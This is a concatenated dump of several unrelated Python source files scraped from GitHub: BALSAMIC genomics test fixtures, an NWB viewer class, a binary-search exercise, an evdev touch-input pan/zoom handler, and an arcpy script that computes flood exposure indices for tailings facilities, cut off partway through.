\"tests/test_data/references/genome/refseq.flat\",\n \"refGene\": \"tests/test_data/references/genome/refGene.txt\",\n \"wgs_calling_interval\": \"tests/test_data/references/genome/wgs_calling_regions.v1\",\n \"genome_chrom_size\": \"tests/test_data/references/genome/hg19.chrom.sizes\",\n \"exon_bed\": \"tests/test_data/references/genome/refseq.flat.bed\",\n \"rankscore\": \"tests/test_data/references/genome/cancer_rank_model_-v0.1-.ini\",\n \"access_regions\": \"tests/test_data/references/genome/access-5k-mappable.hg19.bed\",\n \"delly_exclusion\": \"tests/test_data/references/genome/delly_exclusion.tsv\",\n \"delly_exclusion_converted\": \"tests/test_data/references/genome/delly_exclusion_converted.tsv\",\n \"ascat_gccorrection\": \"tests/test_data/references/genome/GRCh37_SnpGcCorrections.tsv\",\n \"ascat_chryloci\": \"tests/test_data/references/genome/GRCh37_Y.loci\",\n \"clinvar\": \"tests/test_data/references/genome/clinvar.vcf.gz\",\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef pon_fastq_path():\n return \"tests/test_data/fastq/\"\n\n\n@pytest.fixture(scope=\"session\")\ndef panel_bed_file():\n return \"tests/test_data/references/panel/panel.bed\"\n\n\n@pytest.fixture(scope=\"session\")\ndef background_variant_file():\n return \"tests/test_data/references/panel/background_variants.txt\"\n\n\n@pytest.fixture(scope=\"session\")\ndef sentieon_license(tmp_path_factory):\n \"\"\"\n Sentieon's license path fixture\n \"\"\"\n sentieon_license_dir = tmp_path_factory.mktemp(\"sentieon_licence\")\n sentieon_license_path = sentieon_license_dir / \"license_file.lic\"\n sentieon_license_path.touch()\n\n return sentieon_license_path.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef sentieon_install_dir(tmp_path_factory):\n \"\"\"\n Sentieon's license path fixture\n \"\"\"\n sentieon_install_dir = tmp_path_factory.mktemp(\"sentieon_install_dir\")\n Path(sentieon_install_dir / \"bin\").mkdir(exist_ok=True)\n sentieon_executable = sentieon_install_dir / \"bin\" / \"sentieon\"\n sentieon_executable.touch()\n\n return sentieon_install_dir.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef no_write_perm_path(tmp_path_factory):\n \"\"\"\n A path with no write permission\n \"\"\"\n # create a conda_env directory\n bad_perm_path = tmp_path_factory.mktemp(\"bad_perm_path\")\n\n Path(bad_perm_path).chmod(0o444)\n\n return bad_perm_path.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef sample_fastq(tmp_path_factory):\n \"\"\"\n create sample fastq files\n \"\"\"\n fastq_dir = tmp_path_factory.mktemp(\"fastq\")\n fastq_valid = fastq_dir / \"S1_R_1.fastq.gz\"\n fastq_invalid = fastq_dir / \"sample.fastq.gz\"\n\n # dummy tumor fastq file\n tumorfastqr1 = fastq_dir / \"concatenated_tumor_XXXXXX_R_1.fastq.gz\"\n tumorfastqr2 = fastq_dir / \"concatenated_tumor_XXXXXX_R_2.fastq.gz\"\n\n # dummy normal fastq file\n normalfastqr1 = fastq_dir / \"concatenated_normal_XXXXXX_R_1.fastq.gz\"\n normalfastqr2 = fastq_dir / \"concatenated_normal_XXXXXX_R_2.fastq.gz\"\n\n for fastq_file in (\n fastq_valid,\n fastq_invalid,\n tumorfastqr1,\n tumorfastqr2,\n normalfastqr1,\n normalfastqr2,\n ):\n fastq_file.touch()\n\n return {\n \"fastq_valid\": fastq_valid.absolute().as_posix(),\n \"fastq_invalid\": fastq_invalid.absolute().as_posix(),\n \"tumor\": tumorfastqr1.absolute().as_posix(),\n \"normal\": normalfastqr1.absolute().as_posix(),\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef balsamic_cache(tmp_path_factory, reference):\n \"\"\"\n Create singularity container\n \"\"\"\n\n cache_dir = tmp_path_factory.mktemp(\"balsmic_coche\")\n\n cache_container = cache_dir / balsamic_version / \"containers\" / \"align_qc\"\n cache_container.mkdir(parents=True, exist_ok=True)\n cache_container_example = cache_container / \"example.sif\"\n cache_container_example.touch()\n\n cache_reference = cache_dir / balsamic_version / \"hg19\"\n cache_reference.mkdir(parents=True, exist_ok=True)\n\n cache_reference_json = cache_reference / \"reference.json\"\n cache_reference_json.touch()\n with open(cache_reference_json, \"w\") as fp:\n json.dump(reference, fp)\n\n return cache_dir.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef analysis_dir(tmp_path_factory):\n \"\"\"\n Creates and returns analysis directory\n \"\"\"\n analysis_dir = tmp_path_factory.mktemp(\"analysis\", numbered=False)\n\n return analysis_dir.as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef snakemake_job_script(tmp_path_factory, tumor_normal_config):\n \"\"\"\n Creates a dummy snakemake jobscript\n \"\"\"\n\n script_dir = tmp_path_factory.mktemp(\"snakemake_script\")\n snakemake_script_file = script_dir / \"example_script.sh\"\n snakemake_script = \"\"\"#!/bin/sh\n# properties = {\"type\": \"single\", \"rule\": \"all\", \"local\": false, \"input\": [\"dummy_path\"], \"output\": [\"dummy_path\"], \"wildcards\": {}, \"params\": {}, \"log\": [], \"threads\": 1, \"resources\": {}, \"jobid\": 0, \"cluster\": {\"name\": \"BALSAMIC.all.\", \"time\": \"00:15:00\", \"n\": 1, \"mail_type\": \"END\", \"partition\": \"core\"}}\nls -l # dummy command\n\"\"\"\n snakemake_script_file.touch()\n with open(snakemake_script_file, \"w\") as fn:\n fn.write(snakemake_script)\n\n return {\"snakescript\": str(snakemake_script_file)}\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_normal_config(\n tmp_path_factory,\n sample_fastq,\n analysis_dir,\n balsamic_cache,\n background_variant_file,\n panel_bed_file,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx -n xxx to create sample config\n for tumor-normal\n \"\"\"\n case_id = \"sample_tumor_normal\"\n tumor = sample_fastq[\"tumor\"]\n normal = sample_fastq[\"normal\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-p\",\n panel_bed_file,\n \"-t\",\n tumor,\n \"-n\",\n normal,\n \"--case-id\",\n case_id,\n \"--analysis-dir\",\n analysis_dir,\n \"--balsamic-cache\",\n balsamic_cache,\n \"--tumor-sample-name\",\n \"ACC1\",\n \"--normal-sample-name\",\n \"ACC2\",\n \"--background-variants\",\n background_variant_file,\n ],\n )\n\n qc_dir = Path(analysis_dir, case_id, \"analysis\", \"qc\", \"multiqc_data\")\n qc_dir.mkdir(parents=True, exist_ok=False)\n copy_tree(\"tests/test_data/qc_files/analysis/qc/multiqc_data/\", qc_dir.as_posix())\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(name=\"helpers\")\ndef fixture_config_helpers():\n \"\"\"Helper fixture for case config files\"\"\"\n return ConfigHelper()\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_normal_wgs_config(\n tmp_path_factory,\n sample_fastq,\n analysis_dir,\n balsamic_cache,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx -n xxx to create sample config\n for tumor-normal\n \"\"\"\n case_id = \"sample_tumor_normal_wgs\"\n tumor = sample_fastq[\"tumor\"]\n normal = sample_fastq[\"normal\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-t\",\n tumor,\n \"-n\",\n normal,\n \"--case-id\",\n case_id,\n \"--balsamic-cache\",\n balsamic_cache,\n \"--analysis-dir\",\n analysis_dir,\n ],\n )\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_only_config(\n tmpdir_factory,\n sample_fastq,\n balsamic_cache,\n background_variant_file,\n analysis_dir,\n panel_bed_file,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx to create sample config\n for tumor only\n \"\"\"\n case_id = \"sample_tumor_only\"\n tumor = sample_fastq[\"tumor\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-p\",\n panel_bed_file,\n \"-t\",\n tumor,\n \"--case-id\",\n case_id,\n \"--analysis-dir\",\n analysis_dir,\n \"--balsamic-cache\",\n balsamic_cache,\n \"--background-variants\",\n background_variant_file,\n ],\n )\n\n qc_dir = Path(analysis_dir, case_id, \"analysis\", \"qc\", \"multiqc_data\")\n qc_dir.mkdir(parents=True, exist_ok=False)\n copy_tree(\"tests/test_data/qc_files/analysis/qc/multiqc_data/\", qc_dir.as_posix())\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef tumor_only_wgs_config(\n tmp_path_factory,\n sample_fastq,\n analysis_dir,\n balsamic_cache,\n sentieon_license,\n sentieon_install_dir,\n):\n \"\"\"\n invokes balsamic config sample -t xxx to create sample config\n for tumor only\n \"\"\"\n case_id = \"sample_tumor_only_wgs\"\n tumor = sample_fastq[\"tumor\"]\n\n with mock.patch.dict(\n MOCKED_OS_ENVIRON,\n {\n \"SENTIEON_LICENSE\": sentieon_license,\n \"SENTIEON_INSTALL_DIR\": sentieon_install_dir,\n },\n ):\n runner = CliRunner()\n runner.invoke(\n cli,\n [\n \"config\",\n \"case\",\n \"-t\",\n tumor,\n \"--case-id\",\n case_id,\n \"--analysis-dir\",\n analysis_dir,\n \"--balsamic-cache\",\n balsamic_cache,\n ],\n )\n\n return Path(analysis_dir, case_id, case_id + \".json\").as_posix()\n\n\n@pytest.fixture(scope=\"session\")\ndef sample_config():\n \"\"\"\n sample config dict to test workflow utils\n \"\"\"\n sample_config = {\n \"QC\": {\n \"picard_rmdup\": \"False\",\n \"adapter\": \"AATGATACGGCGACCACCGAGATCTACACTCTTTCCCTACACGACGCTCTTCCGATCT\",\n \"min_seq_length\": \"25\",\n \"quality_trim\": \"True\",\n \"adapter_trim\": \"False\",\n \"umi_trim\": \"True\",\n \"umi_trim_length\": \"5\",\n },\n \"analysis\": {\n \"case_id\": \"id1\",\n \"analysis_type\": \"paired\",\n \"analysis_dir\": \"tests/test_data/\",\n \"fastq_path\": \"tests/test_data/id1/fastq/\",\n \"script\": \"tests/test_data/id1/scripts/\",\n \"log\": \"tests/test_data/id1/logs/\",\n \"result\": \"tests/test_data/id1/analysis/\",\n \"config_creation_date\": \"yyyy-mm-dd xx\",\n \"BALSAMIC_version\": \"2.9.8\",\n \"dag\": \"tests/test_data/id1/id1_analysis.json_BALSAMIC_2.9.8_graph.pdf\",\n },\n \"vcf\": {\n \"manta\": {\"mutation\": \"somatic\", \"type\": \"SV\"},\n \"vardict\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"pindel\": {\"mutation\": \"somatic\", \"type\": \"SV\"},\n \"strelka\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"mutect\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"tnscope\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"tnsnv\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"tnhaplotyper\": {\"mutation\": \"somatic\", \"type\": \"SNV\"},\n \"dnascope\": {\"mutation\": \"germline\", \"type\": \"SNV\"},\n \"manta_germline\": {\"mutation\": \"germline\", \"type\": \"SV\"},\n \"haplotypecaller\": {\"mutation\": \"germline\", \"type\": \"SNV\"},\n \"strelka_germline\": {\"mutation\": \"germline\", \"type\": \"SNV\"},\n },\n \"samples\": {\n \"S1_R\": {\n \"file_prefix\": \"S1_R\",\n \"type\": \"tumor\",\n \"readpair_suffix\": [\"1\", \"2\"],\n },\n \"S2_R\": {\n \"file_prefix\": \"S2_R\",\n \"type\": \"normal\",\n \"readpair_suffix\": [\"1\", \"2\"],\n },\n },\n \"umiworkflow\": \"true\",\n }\n\n return sample_config\n\n\n@pytest.fixture(scope=\"session\")\ndef analysis_path():\n \"\"\"Analysis test path\"\"\"\n return \"tests/test_data/qc_files/analysis\"\n\n\n@pytest.fixture(scope=\"session\")\ndef qc_metrics():\n \"\"\"Sample data for QC model testing\"\"\"\n return {\n \"qc\": {\n \"targeted\": {\n \"multiqc_picard_insertSize.json\": {\n \"MEAN_INSERT_SIZE\": {\"condition\": None}\n },\n \"multiqc_picard_HsMetrics.json\": {\n \"MEDIAN_TARGET_COVERAGE\": {\n \"condition\": {\"norm\": \"gt\", \"threshold\": 500.0}\n }\n },\n },\n \"wgs\": {\n \"multiqc_picard_insertSize.json\": {\n \"MEAN_INSERT_SIZE\": {\"condition\": None}\n },\n \"multiqc_picard_dups.json\": {\n \"PERCENT_DUPLICATION\": {\"condition\": None}\n },\n },\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef qc_extracted_metrics():\n \"\"\"Extracted metrics for QC model testing\"\"\"\n return {\n \"metrics\": {\n \"sample_1\": [\n {\n \"name\": \"MEAN_INSERT_SIZE_1\",\n \"norm\": \"lt\",\n \"threshold\": 1.0,\n \"value\": 0.5,\n },\n {\n \"name\": \"MEAN_INSERT_SIZE_2\",\n \"norm\": \"lt\",\n \"threshold\": 1.0,\n \"value\": 0.5,\n },\n ],\n \"sample_2\": [\n {\n \"name\": \"MEAN_INSERT_SIZE_1\",\n \"norm\": \"lt\",\n \"threshold\": 1.0,\n \"value\": 0.5,\n },\n ],\n }\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef qc_raw_targeted_metrics():\n \"\"\"Raw metrics\"\"\"\n return {\n \"default\": {\n \"metrics_1.json\": {\"METRIC_1\": 0.1, \"METRIC_2\": 0.2},\n \"metrics_2.json\": {\"METRIC_3\": 0.3},\n },\n \"panel_1.bed\": {\"metrics_2.json\": {\"METRIC_4\": 0.4}},\n \"panel_2.bed\": {\"metrics_1.json\": {\"METRIC_1\": 0.5, \"METRIC_4\": 0.4}},\n }\n","repo_name":"jxshi/BALSAMIC","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":17370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"71522955611","text":"from neuroanalysis.ui.nwb_viewer import MiesNwbViewer\nfrom neuroanalysis.miesnwb import MiesNwb\n\nfrom .multipatch_view import MultipatchMatrixView\nfrom aisynphys.data import MultiPatchDataset\nfrom .pair_view import PairView\n\n\nclass MultipatchNwbViewer(MiesNwbViewer):\n def create_views(self):\n MiesNwbViewer.create_views(self)\n \n add_views = [\n ('Matrix', MultipatchMatrixView(self)),\n ('Pair', PairView(self)),\n ]\n for name, view in add_views:\n self.tabs.addTab(view, name)\n \n def load_nwb(self, filename):\n nwb = MultiPatchDataset(filename)\n self.set_nwb(nwb)\n return nwb\n","repo_name":"timjarsky/aisynphys","sub_path":"aisynphys/ui/multipatch_nwb_viewer.py","file_name":"multipatch_nwb_viewer.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27059262138","text":"import sys\n\n\nN, M = map(int, sys.stdin.readline().split())\narr = list(map(int, sys.stdin.readline().split()))\n\ndef binary_search(start, end):\n while(start <= end):\n global r\n result = 0\n mid = (start + end) // 2\n\n for i in arr:\n if i >= mid:\n result += i-mid\n \n if result >= mid:\n r = mid\n end = mid-1\n else:\n start = mid+1\n\n\nr = 0\nbinary_search(0, len(arr))\n\nprint(r)","repo_name":"okok0415/Algorithm","sub_path":"Coding_Test/Python/Algorithm/Search/(Book) 떡볶이 떡 만들기.py","file_name":"(Book) 떡볶이 떡 만들기.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1509938129","text":"import selectors\nimport evdev\nfrom threading import Thread\nfrom evdev import ecodes\nfrom pan_zoom_state import PanZoomState\n\n\nclass DeviceState:\n def __init__(self, device, multitouch):\n self.device = device\n self.multitouch = multitouch\n self.fingers_down = 0\n self.abs_pressure = 0\n self.drag_start_x = None\n self.drag_start_y = None\n\n\nclass TouchInputHandler:\n def __init__(self, pan_zoom_state):\n self.pan_zoom_state = pan_zoom_state\n self.grabbed_devices = dict()\n self.stop_requested = False\n\n def listen(self):\n try:\n selector = selectors.DefaultSelector()\n devices = [evdev.InputDevice(path) for path in evdev.list_devices()]\n device_info = dict()\n for device in devices:\n capabilities = device.capabilities(verbose=False)\n mt = is_mt_touch_device(capabilities)\n if mt or is_touch_device(capabilities):\n print(device.path, device.name, device.phys)\n abs_info_abs_x = extract_absinfo(capabilities, ecodes.ABS_X)\n abs_info_abs_y = extract_absinfo(capabilities, ecodes.ABS_Y)\n if abs_info_abs_x is None or abs_info_abs_y is None:\n print(\"No abs_info found on x or y for device \" + device.name)\n continue\n device_info[device.path] = (abs_info_abs_x, abs_info_abs_y)\n selector.register(device, selectors.EVENT_READ)\n self.grabbed_devices[device.path] = DeviceState(device, mt)\n device.grab()\n\n while not self.stop_requested:\n for ready in selector.select(1):\n if not ready:\n continue\n key, mask = ready\n device = key.fileobj\n (abs_info_abs_x, abs_info_abs_y) = device_info[device.path]\n x_size = abs_info_abs_x.max - abs_info_abs_x.min\n y_size = abs_info_abs_y.max - abs_info_abs_y.min\n for event in device.read():\n if event.type == ecodes.EV_ABS:\n if event.code == ecodes.ABS_X:\n if self.grabbed_devices[device.path].drag_start_x is not None:\n self.pan_zoom_state.pan_relative(delta_x=(self.grabbed_devices[device.path].drag_start_x - event.value) / x_size)\n self.grabbed_devices[device.path].drag_start_x = event.value\n if event.code == ecodes.ABS_Y:\n if self.grabbed_devices[device.path].drag_start_y is not None:\n self.pan_zoom_state.pan_relative(delta_y=(self.grabbed_devices[device.path].drag_start_y - event.value) / y_size)\n self.grabbed_devices[device.path].drag_start_y = event.value\n if event.code == ecodes.ABS_MT_TRACKING_ID:\n if event.value == -1:\n self.grabbed_devices[device.path].fingers_down = max(0, self.grabbed_devices[device.path].fingers_down - 1)\n else:\n self.grabbed_devices[device.path].fingers_down = self.grabbed_devices[device.path].fingers_down + 1\n if self.grabbed_devices[device.path].fingers_down == 0:\n self.grabbed_devices[device.path].drag_start_x = None\n self.grabbed_devices[device.path].drag_start_y = None\n if event.code == ecodes.ABS_PRESSURE:\n pressure = event.value\n self.grabbed_devices[device.path].abs_pressure = pressure\n if not self.grabbed_devices[device.path].multitouch:\n if pressure <= 0:\n self.grabbed_devices[device.path].drag_start_x = None\n self.grabbed_devices[device.path].drag_start_y = None\n finally:\n for device_state in self.grabbed_devices.values():\n device_state.device.ungrab()\n\n def stop(self):\n self.stop_requested = True\n\n\ndef is_touch_device(capabilities):\n for prop in (ecodes.ABS_X, ecodes.ABS_Y, ecodes.ABS_PRESSURE):\n if extract_absinfo(capabilities, prop) is None:\n return False\n return True\n\n\ndef is_mt_touch_device(capabilities):\n for prop in (ecodes.ABS_X, ecodes.ABS_Y, ecodes.ABS_MT_TRACKING_ID):\n if extract_absinfo(capabilities, prop) is None:\n return False\n return True\n\n\ndef extract_absinfo(capabilities, type):\n try:\n abs_info_entries = capabilities[ecodes.EV_ABS]\n for abs_info_entry in abs_info_entries:\n if abs_info_entry[0] == type:\n return abs_info_entry[1]\n return None\n except KeyError:\n return None\n\n\nif __name__ == '__main__':\n handler = TouchInputHandler(PanZoomState(1920, 1080, 10, 1920, 180))\n Thread(target=handler.listen, args=()).start()\n","repo_name":"enguerrand/magnipy","sub_path":"touch_input_handler.py","file_name":"touch_input_handler.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"44617198703","text":"\"\"\"\r\nCreated on Mon Apr 19 18:32:50 2021\r\n\r\n@author: uqgpere2 : Gabriel Perez Murillo UQ-SMI \r\n@author: g.perezmurillo@uq.edu.au\r\n\r\nThis script calculates the FEI for different simulations as:\r\n\r\n FEI = FPI x Flood Hazard\r\n\r\nInputs:\r\n 1. Excel files with FPI values for different simulations\r\n 2. Excel files with Hazard values for different simulations\r\n 2. Excel file with the location of the input files (1 & 2)\r\n\"\"\"\r\n#* This script is free software; you can redistribute it and/or modify *\r\n#* it under the terms of the GNU General Public License as published by *\r\n#* the Free Software Foundation; either version 2 of the License, or *\r\n#* any later version. *\r\n\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n# WARNING\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\n# This was written under python 2 (ArcGIS 10.8)\r\n\r\n# This script imports acrpy (you need an ARCGIS license)\r\n\r\n# YOU need to execute these scripts previously:\r\n# \r\n# Generate_Flood_Proximity_Index_for_a_list_of_simulations.py \r\n# Extract_Flood_Hazard_to_TSFs_based_on_FPI.py \r\n# \r\n\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n# WARNING\r\n# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\n\r\n\r\n###############################################################################\r\n#%% PACKAGES YOU NEED TO LOAD\r\n###############################################################################\r\n\r\n# These are the packages you need to load files\r\n\r\nimport sys\r\nimport string \r\nimport os\r\nimport math\r\nimport traceback\r\nimport glob\r\nimport itertools\r\n\r\nimport openpyxl\r\nfrom openpyxl import Workbook\r\n\r\nimport arcpy\r\nfrom arcpy.sa import *\r\n\r\nimport time\r\nfrom datetime import datetime\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\nfrom pandas import ExcelWriter\r\n\r\n# Allow output to overwrite...\r\narcpy.env.overwriteOutput = True\r\n\r\n# Check out the ArcGIS Spatial Analyst extension license\r\narcpy.CheckOutExtension(\"Spatial\")\r\n\r\n###############################################################################\r\n#%% PACKAGES YOU NEED TO LOAD\r\n###############################################################################\r\n\r\n###############################################################################\r\n#%% DEFINITION OF FILE LOCATIONS\r\n###############################################################################\r\n\r\n# Path of the main folder for the simulations\r\ncurrent_working_directory=r'C:\\00-C-GPM_INFO\\04-C-RDM\\04-C-02-Python\\04-C-02-03-TSFs-Exposure' \r\n\r\n# INPUTS FOLDER NAMES----------------------------------------------------------\r\n\r\n# Folder name with inputs files\r\nInput_files_folder_name= r'04-Inputs-files'\r\n\r\n# Folder name with input rasters\r\nInput_rasters_folder_name= r'05-Inputs-rasters'\r\n\r\n# Folder name with input shapefiles\r\nInput_shapes_folder_name= r'06-Inputs-shapes'\r\n\r\n# OUTPUT FOLDER NAMES----------------------------------------------------------\r\n\r\n# the output files folder\r\nOutput_files_folder_name= r'07-Results-files'\r\n\r\n# Folder name with output shapefiles\r\nOutput_rasters_folder_name= r'08-Results-rasters'\r\n\r\n# Folder name with output rasters\r\nOutput_shapes_folder_name= r'09-Results-shapes'\r\n\r\n# RESULTS FOLDER NAMES---------------------------------------------------------\r\n\r\n# Folder name with exposure rasters\r\nOutput_folder_FEI_shps= r'FEI_SHPs'\r\n\r\n# Folder name with exposure tables\r\nOutput_folder_FEI_tables= r'FEI_TABLES'\r\n\r\n# Folder Names for intermediate results\r\nOutput_folder_file_name = \"RESULTS_PAPER_SWIFT\" \r\n\r\n# FOLDER PATHS-----------------------------------------------------------------\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# Inputs\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\n# Path to input files:\r\nInputpath_files= os.path.join(current_working_directory,Input_files_folder_name)\r\n\r\n# Path to input shapes:\r\nInputpath_shapes= os.path.join(current_working_directory,Input_shapes_folder_name)\r\n\r\n# Path to input rasters:\r\nInputpath_rasters= os.path.join(current_working_directory,Input_rasters_folder_name)\r\n\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n# Outputs\r\n# # # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\n# Path to files shapes:\r\nOutPath_files= os.path.join(current_working_directory,Output_files_folder_name)\r\n\r\n# Path to raster results:\r\nOutPath_rasters= os.path.join(current_working_directory,Output_rasters_folder_name)\r\n\r\n# Path to shapefile results:\r\nOutPath_shapes= os.path.join(current_working_directory,Output_shapes_folder_name)\r\n\r\n\r\n\r\n# RESULTS FOLDER -------------------------------------------------------------\r\n\r\n# Path to output shps:\r\nOutPath_FEI_shps= os.path.join(OutPath_shapes,Output_folder_FEI_shps)\r\n\r\n# Path to output files:\r\nOutPath_FEI_files= os.path.join(OutPath_files,Output_folder_FEI_tables)\r\n\r\n\r\n# Results:\r\nOutPath_results_files= os.path.join(OutPath_files,Output_folder_file_name)\r\n\r\nOutPath_results_shps= os.path.join(OutPath_shapes,Output_folder_file_name)\r\n\r\nOutPath_results_rasters= os.path.join(OutPath_rasters,Output_folder_file_name)\r\n\r\n# FILE NAMES-------------------------------------------------------------------\r\n\r\n# Excel file with the list of files to generate FEI\r\nlist_of_input_files= r'00-list-of-files-to-generate-FEI-SWIFT-paper.xls'\r\n\r\n# This is the shapefile with TSFs polygons: \r\nTSFs_polygons_shape= r'TSFs_polygons.shp'\r\n\r\n# This is the shapefile with the polygons' centroids:\r\nTSFs_polygon_centroids_shape = r'TSFs_polygons_centroids.shp'\r\n\r\n# FILE PATHS INPUTS------------------------------------------------------------\r\n\r\n# Here you create a path to the table with the list of rasters\r\ninput_list_file_paths=os.path.join(Inputpath_files,list_of_input_files)\r\n\r\n# Here you create a path to the input shapefiles:\r\n\r\nTSFs_polygons_filepath = os.path.join(Inputpath_shapes,TSFs_polygons_shape)\r\n\r\nTSFs_polygon_centroids_filepath = os.path.join(Inputpath_shapes,TSFs_polygon_centroids_shape)\r\n\r\n###############################################################################\r\n#%% ^ ^ ^ ^ ^ ^ ^ DEFINITION OF FILE LOCATIONS ^ ^ ^ ^ ^ ^ ^ ^ ^\r\n###############################################################################\r\n\r\n###############################################################################\r\n#%% FEI analysis\r\n###############################################################################\r\n\r\n# Here you load the table with the list of rasters\r\n# Warning: MAKE SURE THE FILE LOCATIONS HAVE THE PYTHON NOTATION '\\\\' or '\\' instead of '/' (R)\r\n\r\ndf_file_list=pd.read_excel(input_list_file_paths)\r\n\r\nnumber_of_simulations=len(df_file_list.simulation_ID)\r\n\r\nlist_of_IDs=df_file_list['simulation_ID'].tolist()\r\n\r\n# Here you create the output folders in case they don't exist:\r\n\r\nif not os.path.exists(OutPath_FEI_shps):\r\n os.makedirs(OutPath_FEI_shps)\r\n print(\"Output folder for result shp files didn't exist and was created\")\r\n\r\nif not os.path.exists(OutPath_FEI_files):\r\n os.makedirs(OutPath_FEI_files)\r\n print(\"Output folder result tables didn't exist and was created\")\r\n\r\n# Here you create the output folders in case they don't exist:\r\n\r\nif not os.path.exists(OutPath_results_files):\r\n os.makedirs(OutPath_results_files)\r\n print(\"Output folder for result files didn't exist and was created\")\r\n\r\nif not os.path.exists(OutPath_results_shps):\r\n os.makedirs(OutPath_results_shps)\r\n print(\"Output folder result shps didn't exist and was created\")\r\n\r\nif not os.path.exists(OutPath_results_rasters):\r\n os.makedirs(OutPath_results_rasters)\r\n print(\"Output folder result rasters didn't exist and was created\")\r\n\r\n\r\n# In this loop you calculate the FEI value for each simulation \r\n\r\ntime_before_execution = time.time()\r\n\r\n#\r\n###\r\n########\r\n########### Main Loop \r\n\r\nfor x in range(0,number_of_simulations,1):\r\n\r\n print('...................................................')\r\n print(r'Calculating FEI for simulation # '+str(x+1) + r' out of ' + str(number_of_simulations)) \r\n \r\n simulationID=str(df_file_list.simulation_ID[x])\r\n \r\n print(simulationID)\r\n \r\n FPI_filepath=str(df_file_list.folder_path_FPI_files[x])\r\n FPI_filename=str(df_file_list.Name_FPI_files[x])\r\n \r\n FPI_file=os.path.join(FPI_filepath,FPI_filename)\r\n \r\n df_FPI=pd.read_excel(FPI_file)\r\n \r\n HZ_filepath=str(df_file_list.folder_path_hazard_files[x])\r\n HZ_filename=str(df_file_list.Name_hazard_files[x])\r\n \r\n HZ_file=os.path.join(HZ_filepath,HZ_filename)\r\n\r\n df_HAZARD=pd.read_excel(HZ_file)\r\n \r\n col_TSFs_IDs=df_FPI['TSF_id']\r\n col_TSFs_IDs_2=df_HAZARD['TSF_id']\r\n \r\n # This tests help you confirm that the TSF row order is the sam in the two arrays\r\n test= np.where(col_TSFs_IDs==col_TSFs_IDs_2, 'all good', 'ERROR')\r\n # print(np.unique(test))\r\n \r\n FPI=df_FPI['FPI']\r\n HAZARD=df_HAZARD['max_Hazard']\r\n \r\n FEI=FPI*HAZARD\r\n \r\n #--------------------------------------------------------------------------\r\n # Here you create a dataframe to save an excel file with FEI values\r\n \r\n df_FEI_values= pd.DataFrame({'TSF_id': col_TSFs_IDs,\r\n 'FPI':FPI,\r\n 'Flood_Hazard':HAZARD,\r\n 'FEI':FEI})\r\n \r\n \r\n output_name= r'FEI_values_' +simulationID + r'.xlsx'\r\n output_filepath=os.path.join(OutPath_FEI_files,output_name)\r\n writer = ExcelWriter(output_filepath)\r\n 